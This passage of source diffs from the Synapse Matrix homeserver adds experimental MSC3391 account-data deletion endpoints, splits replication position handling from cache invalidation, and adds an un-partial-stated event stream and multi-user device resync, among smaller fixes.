class ReplicationRemoveUserAccountDataRestServlet(ReplicationEndpoint):
"""Remove user account data on the appropriate account data worker.
Request format:
POST /_synapse/replication/remove_user_account_data/:user_id/:type
{
"content": { ... },
}
"""
NAME = "remove_user_account_data"
PATH_ARGS = ("user_id", "account_data_type")
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
@staticmethod
async def _serialize_payload( # type: ignore[override]
user_id: str, account_data_type: str
) -> JsonDict:
return {}
async def _handle_request( # type: ignore[override]
self, request: Request, user_id: str, account_data_type: str
) -> Tuple[int, JsonDict]:
max_stream_id = await self.handler.remove_account_data_for_user(
user_id, account_data_type
)
return 200, {"max_stream_id": max_stream_id}
class ReplicationAddRoomAccountDataRestServlet(ReplicationEndpoint):
"""Add room account data on the appropriate account data worker.
Request format:
@ -94,7 +131,6 @@ class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -118,6 +154,44 @@ class ReplicationRoomAccountDataRestServlet(ReplicationEndpoint):
return 200, {"max_stream_id": max_stream_id}
class ReplicationRemoveRoomAccountDataRestServlet(ReplicationEndpoint):
"""Remove room account data on the appropriate account data worker.
Request format:
POST /_synapse/replication/remove_room_account_data/:user_id/:room_id/:account_data_type
{
"content": { ... },
}
"""
NAME = "remove_room_account_data"
PATH_ARGS = ("user_id", "room_id", "account_data_type")
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
@staticmethod
async def _serialize_payload( # type: ignore[override]
user_id: str, room_id: str, account_data_type: str, content: JsonDict
) -> JsonDict:
return {}
async def _handle_request( # type: ignore[override]
self, request: Request, user_id: str, room_id: str, account_data_type: str
) -> Tuple[int, JsonDict]:
max_stream_id = await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {"max_stream_id": max_stream_id}
class ReplicationAddTagRestServlet(ReplicationEndpoint):
"""Add tag on the appropriate account data worker.
@ -139,7 +213,6 @@ class ReplicationAddTagRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload( # type: ignore[override]
@ -186,7 +259,6 @@ class ReplicationRemoveTagRestServlet(ReplicationEndpoint):
super().__init__(hs)
self.handler = hs.get_account_data_handler()
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload(user_id: str, room_id: str, tag: str) -> JsonDict: # type: ignore[override]
@ -206,7 +278,11 @@ class ReplicationRemoveTagRestServlet(ReplicationEndpoint):
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
ReplicationUserAccountDataRestServlet(hs).register(http_server)
ReplicationRoomAccountDataRestServlet(hs).register(http_server)
ReplicationAddUserAccountDataRestServlet(hs).register(http_server)
ReplicationAddRoomAccountDataRestServlet(hs).register(http_server)
ReplicationAddTagRestServlet(hs).register(http_server)
ReplicationRemoveTagRestServlet(hs).register(http_server)
if hs.config.experimental.msc3391_enabled:
ReplicationRemoveUserAccountDataRestServlet(hs).register(http_server)
ReplicationRemoveRoomAccountDataRestServlet(hs).register(http_server)

View File

@ -13,12 +13,13 @@
# limitations under the License.
import logging
from typing import TYPE_CHECKING, Optional, Tuple
from typing import TYPE_CHECKING, Dict, List, Optional, Tuple
from twisted.web.server import Request
from synapse.http.server import HttpServer
from synapse.http.servlet import parse_json_object_from_request
from synapse.logging.opentracing import active_span
from synapse.replication.http._base import ReplicationEndpoint
from synapse.types import JsonDict
@ -84,6 +85,76 @@ class ReplicationUserDevicesResyncRestServlet(ReplicationEndpoint):
return 200, user_devices
class ReplicationMultiUserDevicesResyncRestServlet(ReplicationEndpoint):
"""Ask master to resync the device list for multiple users from the same
remote server by contacting their server.
This must happen on master so that the results can be correctly cached in
the database and streamed to workers.
Request format:
POST /_synapse/replication/multi_user_device_resync
{
"user_ids": ["@alice:example.org", "@bob:example.org", ...]
}
Response is roughly equivalent to ` /_matrix/federation/v1/user/devices/:user_id`
response, but there is a map from user ID to response, e.g.:
{
"@alice:example.org": {
"devices": [
{
"device_id": "JLAFKJWSCS",
"keys": { ... },
"device_display_name": "Alice's Mobile Phone"
}
]
},
...
}
"""
NAME = "multi_user_device_resync"
PATH_ARGS = ()
CACHE = False
def __init__(self, hs: "HomeServer"):
super().__init__(hs)
from synapse.handlers.device import DeviceHandler
handler = hs.get_device_handler()
assert isinstance(handler, DeviceHandler)
self.device_list_updater = handler.device_list_updater
self.store = hs.get_datastores().main
self.clock = hs.get_clock()
@staticmethod
async def _serialize_payload(user_ids: List[str]) -> JsonDict: # type: ignore[override]
return {"user_ids": user_ids}
async def _handle_request( # type: ignore[override]
self, request: Request
) -> Tuple[int, Dict[str, Optional[JsonDict]]]:
content = parse_json_object_from_request(request)
user_ids: List[str] = content["user_ids"]
logger.info("Resync for %r", user_ids)
span = active_span()
if span:
span.set_tag("user_ids", f"{user_ids!r}")
multi_user_devices = await self.device_list_updater.multi_user_device_resync(
user_ids
)
return 200, multi_user_devices
class ReplicationUploadKeysForUserRestServlet(ReplicationEndpoint):
"""Ask master to upload keys for the user and send them out over federation to
update other servers.
@ -151,4 +222,5 @@ class ReplicationUploadKeysForUserRestServlet(ReplicationEndpoint):
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
ReplicationUserDevicesResyncRestServlet(hs).register(http_server)
ReplicationMultiUserDevicesResyncRestServlet(hs).register(http_server)
ReplicationUploadKeysForUserRestServlet(hs).register(http_server)

View File

@ -36,6 +36,7 @@ from synapse.replication.tcp.streams import (
TagAccountDataStream,
ToDeviceStream,
TypingStream,
UnPartialStatedEventStream,
UnPartialStatedRoomStream,
)
from synapse.replication.tcp.streams.events import (
@ -43,7 +44,10 @@ from synapse.replication.tcp.streams.events import (
EventsStreamEventRow,
EventsStreamRow,
)
from synapse.replication.tcp.streams.partial_state import UnPartialStatedRoomStreamRow
from synapse.replication.tcp.streams.partial_state import (
UnPartialStatedEventStreamRow,
UnPartialStatedRoomStreamRow,
)
from synapse.types import PersistedEventPosition, ReadReceipt, StreamKeyType, UserID
from synapse.util.async_helpers import Linearizer, timeout_deferred
from synapse.util.metrics import Measure
@ -148,6 +152,9 @@ class ReplicationDataHandler:
rows: a list of Stream.ROW_TYPE objects as returned by Stream.parse_row.
"""
self.store.process_replication_rows(stream_name, instance_name, token, rows)
# NOTE: this must be called after process_replication_rows to ensure any
# cache invalidations are first handled before any stream ID advances.
self.store.process_replication_position(stream_name, instance_name, token)
if self.send_handler:
await self.send_handler.process_replication_rows(stream_name, token, rows)
@ -247,6 +254,14 @@ class ReplicationDataHandler:
self._state_storage_controller.notify_room_un_partial_stated(
row.room_id
)
elif stream_name == UnPartialStatedEventStream.NAME:
for row in rows:
assert isinstance(row, UnPartialStatedEventStreamRow)
# Wake up any tasks waiting for the event to be un-partial-stated.
self._state_storage_controller.notify_event_un_partial_stated(
row.event_id
)
await self._presence_handler.process_replication_rows(
stream_name, instance_name, token, rows

View File

@ -42,7 +42,10 @@ from synapse.replication.tcp.streams._base import (
)
from synapse.replication.tcp.streams.events import EventsStream
from synapse.replication.tcp.streams.federation import FederationStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedRoomStream
from synapse.replication.tcp.streams.partial_state import (
UnPartialStatedEventStream,
UnPartialStatedRoomStream,
)
STREAMS_MAP = {
stream.NAME: stream
@ -63,6 +66,7 @@ STREAMS_MAP = {
AccountDataStream,
UserSignatureStream,
UnPartialStatedRoomStream,
UnPartialStatedEventStream,
)
}
@ -83,4 +87,5 @@ __all__ = [
"AccountDataStream",
"UserSignatureStream",
"UnPartialStatedRoomStream",
"UnPartialStatedEventStream",
]

View File

@ -46,3 +46,31 @@ class UnPartialStatedRoomStream(Stream):
current_token_without_instance(store.get_un_partial_stated_rooms_token),
store.get_un_partial_stated_rooms_from_stream,
)
@attr.s(slots=True, frozen=True, auto_attribs=True)
class UnPartialStatedEventStreamRow:
# ID of the event that has been un-partial-stated.
event_id: str
# True iff the rejection status of the event changed as a result of being
# un-partial-stated.
rejection_status_changed: bool
class UnPartialStatedEventStream(Stream):
"""
Stream to notify about events becoming un-partial-stated.
"""
NAME = "un_partial_stated_event"
ROW_TYPE = UnPartialStatedEventStreamRow
def __init__(self, hs: "HomeServer"):
store = hs.get_datastores().main
super().__init__(
hs.get_instance_name(),
# TODO(faster_joins, multiple writers): we need to account for instance names
current_token_without_instance(store.get_un_partial_stated_events_token),
store.get_un_partial_stated_events_from_stream,
)

View File

@ -3,11 +3,10 @@
{% block header %}
<script src="https://www.recaptcha.net/recaptcha/api.js" async defer></script>
<script src="//code.jquery.com/jquery-1.11.2.min.js"></script>
<link rel="stylesheet" href="/_matrix/static/client/register/style.css">
<script>
function captchaDone() {
$('#registrationForm').submit();
document.getElementById('registrationForm').submit();
}
</script>
{% endblock %}

View File

@ -338,6 +338,11 @@ class EmailThreepidRequestTokenRestServlet(RestServlet):
)
async def on_POST(self, request: SynapseRequest) -> Tuple[int, JsonDict]:
if not self.hs.config.registration.enable_3pid_changes:
raise SynapseError(
400, "3PID changes are disabled on this server", Codes.FORBIDDEN
)
if not self.config.email.can_verify_email:
logger.warning(
"Adding emails have been disabled due to lack of an email config"

View File

@ -41,6 +41,7 @@ class AccountDataServlet(RestServlet):
def __init__(self, hs: "HomeServer"):
super().__init__()
self._hs = hs
self.auth = hs.get_auth()
self.store = hs.get_datastores().main
self.handler = hs.get_account_data_handler()
@ -54,6 +55,16 @@ class AccountDataServlet(RestServlet):
body = parse_json_object_from_request(request)
# If experimental support for MSC3391 is enabled, then providing an empty dict
# as the value for an account data type should be functionally equivalent to
# calling the DELETE method on the same type.
if self._hs.config.experimental.msc3391_enabled:
if body == {}:
await self.handler.remove_account_data_for_user(
user_id, account_data_type
)
return 200, {}
await self.handler.add_account_data_for_user(user_id, account_data_type, body)
return 200, {}
@ -72,9 +83,48 @@ class AccountDataServlet(RestServlet):
if event is None:
raise NotFoundError("Account data not found")
# If experimental support for MSC3391 is enabled, then this endpoint should
# return a 404 if the content for an account data type is an empty dict.
if self._hs.config.experimental.msc3391_enabled and event == {}:
raise NotFoundError("Account data not found")
return 200, event
class UnstableAccountDataServlet(RestServlet):
"""
Contains an unstable endpoint for removing user account data, as specified by
MSC3391. If that MSC is accepted, this code should have unstable prefixes removed
and become incorporated into AccountDataServlet above.
"""
PATTERNS = client_patterns(
"/org.matrix.msc3391/user/(?P<user_id>[^/]*)"
"/account_data/(?P<account_data_type>[^/]*)",
unstable=True,
releases=(),
)
def __init__(self, hs: "HomeServer"):
super().__init__()
self.auth = hs.get_auth()
self.handler = hs.get_account_data_handler()
async def on_DELETE(
self,
request: SynapseRequest,
user_id: str,
account_data_type: str,
) -> Tuple[int, JsonDict]:
requester = await self.auth.get_user_by_req(request)
if user_id != requester.user.to_string():
raise AuthError(403, "Cannot delete account data for other users.")
await self.handler.remove_account_data_for_user(user_id, account_data_type)
return 200, {}
class RoomAccountDataServlet(RestServlet):
"""
PUT /user/{user_id}/rooms/{room_id}/account_data/{account_dataType} HTTP/1.1
@ -89,6 +139,7 @@ class RoomAccountDataServlet(RestServlet):
def __init__(self, hs: "HomeServer"):
super().__init__()
self._hs = hs
self.auth = hs.get_auth()
self.store = hs.get_datastores().main
self.handler = hs.get_account_data_handler()
@ -121,6 +172,16 @@ class RoomAccountDataServlet(RestServlet):
Codes.BAD_JSON,
)
# If experimental support for MSC3391 is enabled, then providing an empty dict
# as the value for an account data type should be functionally equivalent to
# calling the DELETE method on the same type.
if self._hs.config.experimental.msc3391_enabled:
if body == {}:
await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {}
await self.handler.add_account_data_to_room(
user_id, room_id, account_data_type, body
)
@ -152,9 +213,63 @@ class RoomAccountDataServlet(RestServlet):
if event is None:
raise NotFoundError("Room account data not found")
# If experimental support for MSC3391 is enabled, then this endpoint should
# return a 404 if the content for an account data type is an empty dict.
if self._hs.config.experimental.msc3391_enabled and event == {}:
raise NotFoundError("Room account data not found")
return 200, event
class UnstableRoomAccountDataServlet(RestServlet):
"""
Contains an unstable endpoint for removing room account data, as specified by
MSC3391. If that MSC is accepted, this code should have unstable prefixes removed
and become incorporated into RoomAccountDataServlet above.
"""
PATTERNS = client_patterns(
"/org.matrix.msc3391/user/(?P<user_id>[^/]*)"
"/rooms/(?P<room_id>[^/]*)"
"/account_data/(?P<account_data_type>[^/]*)",
unstable=True,
releases=(),
)
def __init__(self, hs: "HomeServer"):
super().__init__()
self.auth = hs.get_auth()
self.handler = hs.get_account_data_handler()
async def on_DELETE(
self,
request: SynapseRequest,
user_id: str,
room_id: str,
account_data_type: str,
) -> Tuple[int, JsonDict]:
requester = await self.auth.get_user_by_req(request)
if user_id != requester.user.to_string():
raise AuthError(403, "Cannot delete account data for other users.")
if not RoomID.is_valid(room_id):
raise SynapseError(
400,
f"{room_id} is not a valid room ID",
Codes.INVALID_PARAM,
)
await self.handler.remove_account_data_for_room(
user_id, room_id, account_data_type
)
return 200, {}
def register_servlets(hs: "HomeServer", http_server: HttpServer) -> None:
AccountDataServlet(hs).register(http_server)
RoomAccountDataServlet(hs).register(http_server)
if hs.config.experimental.msc3391_enabled:
UnstableAccountDataServlet(hs).register(http_server)
UnstableRoomAccountDataServlet(hs).register(http_server)

View File

@ -11,6 +11,7 @@
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import html
import logging
import urllib.parse
from typing import TYPE_CHECKING, List, Optional
@ -161,7 +162,9 @@ class OEmbedProvider:
title = oembed.get("title")
if title and isinstance(title, str):
open_graph_response["og:title"] = title
# A common WordPress plug-in seems to incorrectly escape entities
# in the oEmbed response.
open_graph_response["og:title"] = html.unescape(title)
author_name = oembed.get("author_name")
if not isinstance(author_name, str):
@ -180,9 +183,9 @@ class OEmbedProvider:
# Process each type separately.
oembed_type = oembed.get("type")
if oembed_type == "rich":
html = oembed.get("html")
if isinstance(html, str):
calc_description_and_urls(open_graph_response, html)
html_str = oembed.get("html")
if isinstance(html_str, str):
calc_description_and_urls(open_graph_response, html_str)
elif oembed_type == "photo":
# If this is a photo, use the full image, not the thumbnail.
@ -192,8 +195,8 @@ class OEmbedProvider:
elif oembed_type == "video":
open_graph_response["og:type"] = "video.other"
html = oembed.get("html")
if html and isinstance(html, str):
html_str = oembed.get("html")
if html_str and isinstance(html_str, str):
calc_description_and_urls(open_graph_response, oembed["html"])
for size in ("width", "height"):
val = oembed.get(size)

View File

@ -202,14 +202,20 @@ class StateHandler:
room_id: the room_id containing the given events.
event_ids: the events whose state should be fetched and resolved.
await_full_state: if `True`, will block if we do not yet have complete state
at the given `event_id`s, regardless of whether `state_filter` is
satisfied by partial state.
at these events and `state_filter` is not satisfied by partial state.
Defaults to `True`.
Returns:
the state dict (a mapping from (event_type, state_key) -> event_id) which
holds the resolution of the states after the given event IDs.
"""
logger.debug("calling resolve_state_groups from compute_state_after_events")
if (
await_full_state
and state_filter
and not state_filter.must_await_full_state(self.hs.is_mine_id)
):
await_full_state = False
ret = await self.resolve_state_groups_for_events(
room_id, event_ids, await_full_state
)

View File

@ -57,7 +57,22 @@ class SQLBaseStore(metaclass=ABCMeta):
token: int,
rows: Iterable[Any],
) -> None:
pass
"""
Used by storage classes to invalidate caches based on incoming replication data. These
must not update any ID generators, use `process_replication_position`.
"""
def process_replication_position( # noqa: B027 (no-op by design)
self,
stream_name: str,
instance_name: str,
token: int,
) -> None:
"""
Used by storage classes to advance ID generators based on incoming replication data. This
is called after process_replication_rows such that caches are invalidated before any token
positions advance.
"""
def _invalidate_state_caches(
self, room_id: str, members_changed: Collection[str]

View File

@ -1762,7 +1762,8 @@ class DatabasePool:
desc: description of the transaction, for logging and metrics
Returns:
A list of dictionaries.
A list of dictionaries, one per result row, each a mapping between the
column names from `retcols` and that column's value for the row.
"""
return await self.runInteraction(
desc,
@ -1791,6 +1792,10 @@ class DatabasePool:
column names and values to select the rows with, or None to not
apply a WHERE clause.
retcols: the names of the columns to return
Returns:
A list of dictionaries, one per result row, each a mapping between the
column names from `retcols` and that column's value for the row.
"""
if keyvalues:
sql = "SELECT %s FROM %s WHERE %s" % (
@ -1898,6 +1903,19 @@ class DatabasePool:
updatevalues: Dict[str, Any],
desc: str,
) -> int:
"""
Update rows in the given database table.
If the given keyvalues don't match anything, nothing will be updated.
Args:
table: The database table to update.
keyvalues: A mapping of column name to value to match rows on.
updatevalues: A mapping of column name to value to replace in any matched rows.
desc: description of the transaction, for logging and metrics.
Returns:
The number of rows that were updated. Will be 0 if no matching rows were found.
"""
return await self.runInteraction(
desc, self.simple_update_txn, table, keyvalues, updatevalues
)
@ -1909,6 +1927,19 @@ class DatabasePool:
keyvalues: Dict[str, Any],
updatevalues: Dict[str, Any],
) -> int:
"""
Update rows in the given database table.
If the given keyvalues don't match anything, nothing will be updated.
Args:
txn: The database transaction object.
table: The database table to update.
keyvalues: A mapping of column name to value to match rows on.
updatevalues: A mapping of column name to value to replace in any matched rows.
Returns:
The number of rows that were updated. Will be 0 if no matching rows were found.
"""
if keyvalues:
where = "WHERE %s" % " AND ".join("%s = ?" % k for k in keyvalues.keys())
else:

View File

@ -123,7 +123,11 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
async def get_account_data_for_user(
self, user_id: str
) -> Tuple[Dict[str, JsonDict], Dict[str, Dict[str, JsonDict]]]:
"""Get all the client account_data for a user.
"""
Get all the client account_data for a user.
If experimental MSC3391 support is enabled, any entries with an empty
content body are excluded; as this means they have been deleted.
Args:
user_id: The user to get the account_data for.
@ -135,27 +139,48 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
def get_account_data_for_user_txn(
txn: LoggingTransaction,
) -> Tuple[Dict[str, JsonDict], Dict[str, Dict[str, JsonDict]]]:
rows = self.db_pool.simple_select_list_txn(
txn,
"account_data",
{"user_id": user_id},
["account_data_type", "content"],
)
# The 'content != '{}' condition below prevents us from using
# `simple_select_list_txn` here, as it doesn't support conditions
# other than 'equals'.
sql = """
SELECT account_data_type, content FROM account_data
WHERE user_id = ?
"""
# If experimental MSC3391 support is enabled, then account data entries
# with an empty content are considered "deleted". So skip adding them to
# the results.
if self.hs.config.experimental.msc3391_enabled:
sql += " AND content != '{}'"
txn.execute(sql, (user_id,))
rows = self.db_pool.cursor_to_dict(txn)
global_account_data = {
row["account_data_type"]: db_to_json(row["content"]) for row in rows
}
rows = self.db_pool.simple_select_list_txn(
txn,
"room_account_data",
{"user_id": user_id},
["room_id", "account_data_type", "content"],
)
# The 'content != '{}' condition below prevents us from using
# `simple_select_list_txn` here, as it doesn't support conditions
# other than 'equals'.
sql = """
SELECT room_id, account_data_type, content FROM room_account_data
WHERE user_id = ?
"""
# If experimental MSC3391 support is enabled, then account data entries
# with an empty content are considered "deleted". So skip adding them to
# the results.
if self.hs.config.experimental.msc3391_enabled:
sql += " AND content != '{}'"
txn.execute(sql, (user_id,))
rows = self.db_pool.cursor_to_dict(txn)
by_room: Dict[str, Dict[str, JsonDict]] = {}
for row in rows:
room_data = by_room.setdefault(row["room_id"], {})
room_data[row["account_data_type"]] = db_to_json(row["content"])
return global_account_data, by_room
@ -411,10 +436,7 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
token: int,
rows: Iterable[Any],
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
elif stream_name == AccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
if stream_name == AccountDataStream.NAME:
for row in rows:
if not row.room_id:
self.get_global_account_data_by_type_for_user.invalidate(
@ -429,6 +451,15 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == TagAccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
elif stream_name == AccountDataStream.NAME:
self._account_data_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
async def add_account_data_to_room(
self, user_id: str, room_id: str, account_data_type: str, content: JsonDict
) -> int:
@ -469,6 +500,72 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
return self._account_data_id_gen.get_current_token()
async def remove_account_data_for_room(
self, user_id: str, room_id: str, account_data_type: str
) -> Optional[int]:
"""Delete the room account data for the user of a given type.
Args:
user_id: The user to remove account_data for.
room_id: The room ID to scope the request to.
account_data_type: The account data type to delete.
Returns:
The maximum stream position, or None if there was no matching room account
data to delete.
"""
assert self._can_write_to_account_data
assert isinstance(self._account_data_id_gen, AbstractStreamIdGenerator)
def _remove_account_data_for_room_txn(
txn: LoggingTransaction, next_id: int
) -> bool:
"""
Args:
txn: The transaction object.
next_id: The stream_id to update any existing rows to.
Returns:
True if an entry in room_account_data had its content set to '{}',
otherwise False. This informs callers of whether there actually was an
existing room account data entry to delete, or if the call was a no-op.
"""
# We can't use `simple_update` as it doesn't have the ability to specify
# where clauses other than '=', which we need for `content != '{}'` below.
sql = """
UPDATE room_account_data
SET stream_id = ?, content = '{}'
WHERE user_id = ?
AND room_id = ?
AND account_data_type = ?
AND content != '{}'
"""
txn.execute(
sql,
(next_id, user_id, room_id, account_data_type),
)
# Return true if any rows were updated.
return txn.rowcount != 0
async with self._account_data_id_gen.get_next() as next_id:
row_updated = await self.db_pool.runInteraction(
"remove_account_data_for_room",
_remove_account_data_for_room_txn,
next_id,
)
if not row_updated:
return None
self._account_data_stream_cache.entity_has_changed(user_id, next_id)
self.get_account_data_for_user.invalidate((user_id,))
self.get_account_data_for_room.invalidate((user_id, room_id))
self.get_account_data_for_room_and_type.prefill(
(user_id, room_id, account_data_type), {}
)
return self._account_data_id_gen.get_current_token()
async def add_account_data_for_user(
self, user_id: str, account_data_type: str, content: JsonDict
) -> int:
@ -569,6 +666,108 @@ class AccountDataWorkerStore(PushRulesWorkerStore, CacheInvalidationWorkerStore)
self._invalidate_cache_and_stream(txn, self.ignored_by, (ignored_user_id,))
self._invalidate_cache_and_stream(txn, self.ignored_users, (user_id,))
async def remove_account_data_for_user(
self,
user_id: str,
account_data_type: str,
) -> Optional[int]:
"""
Delete a single piece of user account data by type.
A "delete" is performed by updating a potentially existing row in the
"account_data" database table for (user_id, account_data_type) and
setting its content to "{}".
Args:
user_id: The user ID to modify the account data of.
account_data_type: The type to remove.
Returns:
The maximum stream position, or None if there was no matching account data
to delete.
"""
assert self._can_write_to_account_data
assert isinstance(self._account_data_id_gen, AbstractStreamIdGenerator)
def _remove_account_data_for_user_txn(
txn: LoggingTransaction, next_id: int
) -> bool:
"""
Args:
txn: The transaction object.
next_id: The stream_id to update any existing rows to.
Returns:
True if an entry in account_data had its content set to '{}', otherwise
False. This informs callers of whether there actually was an existing
account data entry to delete, or if the call was a no-op.
"""
# We can't use `simple_update` as it doesn't have the ability to specify
# where clauses other than '=', which we need for `content != '{}'` below.
sql = """
UPDATE account_data
SET stream_id = ?, content = '{}'
WHERE user_id = ?
AND account_data_type = ?
AND content != '{}'
"""
txn.execute(sql, (next_id, user_id, account_data_type))
if txn.rowcount == 0:
# We didn't update any rows. This means that there was no matching room
# account data entry to delete in the first place.
return False
# Ignored users get denormalized into a separate table as an optimisation.
if account_data_type == AccountDataTypes.IGNORED_USER_LIST:
# If this method was called with the ignored users account data type, we
# simply delete all ignored users.
# First pull all the users that this user ignores.
previously_ignored_users = set(
self.db_pool.simple_select_onecol_txn(
txn,
table="ignored_users",
keyvalues={"ignorer_user_id": user_id},
retcol="ignored_user_id",
)
)
# Then delete them from the database.
self.db_pool.simple_delete_txn(
txn,
table="ignored_users",
keyvalues={"ignorer_user_id": user_id},
)
# Invalidate the cache for ignored users which were removed.
for ignored_user_id in previously_ignored_users:
self._invalidate_cache_and_stream(
txn, self.ignored_by, (ignored_user_id,)
)
# Invalidate for this user the cache tracking ignored users.
self._invalidate_cache_and_stream(txn, self.ignored_users, (user_id,))
return True
async with self._account_data_id_gen.get_next() as next_id:
row_updated = await self.db_pool.runInteraction(
"remove_account_data_for_user",
_remove_account_data_for_user_txn,
next_id,
)
if not row_updated:
return None
self._account_data_stream_cache.entity_has_changed(user_id, next_id)
self.get_account_data_for_user.invalidate((user_id,))
self.get_global_account_data_by_type_for_user.prefill(
(user_id, account_data_type), {}
)
return self._account_data_id_gen.get_current_token()
async def purge_account_data_for_user(self, user_id: str) -> None:
"""
Removes ALL the account data for a user.

View File

@ -164,9 +164,6 @@ class CacheInvalidationWorkerStore(SQLBaseStore):
backfilled=True,
)
elif stream_name == CachesStream.NAME:
if self._cache_id_gen:
self._cache_id_gen.advance(instance_name, token)
for row in rows:
if row.cache_func == CURRENT_STATE_CACHE_NAME:
if row.keys is None:
@ -182,6 +179,14 @@ class CacheInvalidationWorkerStore(SQLBaseStore):
super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == CachesStream.NAME:
if self._cache_id_gen:
self._cache_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _process_event_stream_row(self, token: int, row: EventsStreamRow) -> None:
data = row.data

View File

@ -157,6 +157,13 @@ class DeviceInboxWorkerStore(SQLBaseStore):
)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == ToDeviceStream.NAME:
self._device_inbox_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def get_to_device_stream_token(self) -> int:
return self._device_inbox_id_gen.get_current_token()

View File

@ -54,7 +54,7 @@ from synapse.storage.util.id_generators import (
AbstractStreamIdTracker,
StreamIdGenerator,
)
from synapse.types import JsonDict, get_verify_key_from_cross_signing_key
from synapse.types import JsonDict, StrCollection, get_verify_key_from_cross_signing_key
from synapse.util import json_decoder, json_encoder
from synapse.util.caches.descriptors import cached, cachedList
from synapse.util.caches.lrucache import LruCache
@ -162,14 +162,21 @@ class DeviceWorkerStore(RoomMemberWorkerStore, EndToEndKeyWorkerStore):
self, stream_name: str, instance_name: str, token: int, rows: Iterable[Any]
) -> None:
if stream_name == DeviceListsStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
self._invalidate_caches_for_devices(token, rows)
elif stream_name == UserSignatureStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
for row in rows:
self._user_signature_stream_cache.entity_has_changed(row.user_id, token)
return super().process_replication_rows(stream_name, instance_name, token, rows)
def process_replication_position(
self, stream_name: str, instance_name: str, token: int
) -> None:
if stream_name == DeviceListsStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
elif stream_name == UserSignatureStream.NAME:
self._device_list_id_gen.advance(instance_name, token)
super().process_replication_position(stream_name, instance_name, token)
def _invalidate_caches_for_devices(
self, token: int, rows: Iterable[DeviceListsStream.DeviceListsStreamRow]
) -> None:
@ -1062,16 +1069,30 @@ class DeviceWorkerStore(RoomMemberWorkerStore, EndToEndKeyWorkerStore):
return {row["user_id"] for row in rows}
async def mark_remote_user_device_cache_as_stale(self, user_id: str) -> None:
async def mark_remote_users_device_caches_as_stale(
self, user_ids: StrCollection
) -> None:
"""Records that the server has reason to believe the cache of the devices
for the remote users is out of date.
"""
await self.db_pool.simple_upsert(
table="device_lists_remote_resync",
keyvalues={"user_id": user_id},
values={},
insertion_values={"added_ts": self._clock.time_msec()},
desc="mark_remote_user_device_cache_as_stale",
def _mark_remote_users_device_caches_as_stale_txn(
txn: LoggingTransaction,
) -> None:
# TODO add insertion_values support to simple_upsert_many and use
# that!
for user_id in user_ids:
self.db_pool.simple_upsert_txn(
txn,
table="device_lists_remote_resync",
keyvalues={"user_id": user_id},
values={},
insertion_values={"added_ts": self._clock.time_msec()},
)
await self.db_pool.runInteraction(
"mark_remote_users_device_caches_as_stale",
_mark_remote_users_device_caches_as_stale_txn,
)
async def mark_remote_user_device_cache_as_valid(self, user_id: str) -> None:

View File

@ -274,15 +274,6 @@ class EventPushActionsWorkerStore(ReceiptsWorkerStore, StreamWorkerStore, SQLBas
self._clear_old_push_actions_staging, 30 * 60 * 1000
)
self.db_pool.updates.register_background_index_update(
"event_push_summary_unique_index",
index_name="event_push_summary_unique_index",
table="event_push_summary",
columns=["user_id", "room_id"],
unique=True,
replaces_index="event_push_summary_user_rm",
)
self.db_pool.updates.register_background_index_update(
"event_push_summary_unique_index2",
index_name="event_push_summary_unique_index2",

View File

@ -59,8 +59,9 @@ from synapse.metrics.background_process_metrics import (
run_as_background_process,
wrap_as_background_process,
)
from synapse.replication.tcp.streams import BackfillStream
from synapse.replication.tcp.streams import BackfillStream, UnPartialStatedEventStream
from synapse.replication.tcp.streams.events import EventsStream
from synapse.replication.tcp.streams.partial_state import UnPartialStatedEventStreamRow
from synapse.storage._base import SQLBaseStore, db_to_json, make_in_list_sql_clause
from synapse.storage.database import (
DatabasePool,
@ -70,6 +71,7 @@ from synapse.storage.database import (
from synapse.storage.engines import PostgresEngine
from synapse.storage.types import Cursor
from synapse.storage.util.id_generators import (
AbstractStreamIdGenerator,
AbstractStreamIdTracker,
MultiWriterIdGenerator,
StreamIdGenerator,
@ -292,19 +294,121 @@ class EventsWorkerStore(SQLBaseStore):
id_column="chain_id",
)
self._un_partial_stated_events_stream_id_gen: AbstractStreamIdGenerator
if isinstance(database.engine, PostgresEngine):
self._un_partial_stated_events_stream_id_gen = MultiWriterIdGenerator(
db_conn=db_conn,
db=database,
